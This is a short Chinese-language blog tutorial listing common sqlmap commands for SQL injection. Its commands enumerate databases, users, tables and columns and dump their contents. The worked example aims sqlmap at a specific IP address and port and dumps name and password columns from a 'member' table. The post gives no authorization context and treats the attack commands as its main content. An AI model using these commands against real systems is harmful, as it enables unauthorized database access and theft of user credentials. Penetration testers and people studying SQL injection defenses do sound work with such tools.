当前位置：网站首页>sqlmap注入教程常用指令

sqlmap注入教程常用指令

2022-07-31 05:10:00 【不习惯有你】

sqlmap 注入教程常用命令大全
sqlmap 官网：sqlmap: automatic SQL injection and database takeover tool
sqlmap文档地址：https://github.com/sqlmapproject/sqlmap/wiki/Usage
–hh 帮助手册详细
重点部分
sqlmap.py -u “注入地址” --dbs // 列举数据库
sqlmap.py -u “注入地址” --current-db // 当前数据库
sqlmap.py -u “注入地址” --users // 列数据库用户
sqlmap.py -u “注入地址” --current–user // 当前用户
sqlmap.py -u “注入地址” --tables -D “数据库” // 列举数据库的表名
sqlmap.py -u “注入地址” --columns -T “表名” -D “数据库” // 获取表的列名
sqlmap.py -u “注入地址” --dump -C “列名字” -T “表名字” -D “数据库” //获取数据库下表的列信息
最好在指令后面加 --level 3 --risk2,可以提升扫描时的深度于速率

--delay=1 指的是一秒钟发一个包

例如:
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” --dbs //爆库
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup --tables //爆表
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member --columns 爆列
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member -C name,password --dump 爆字段值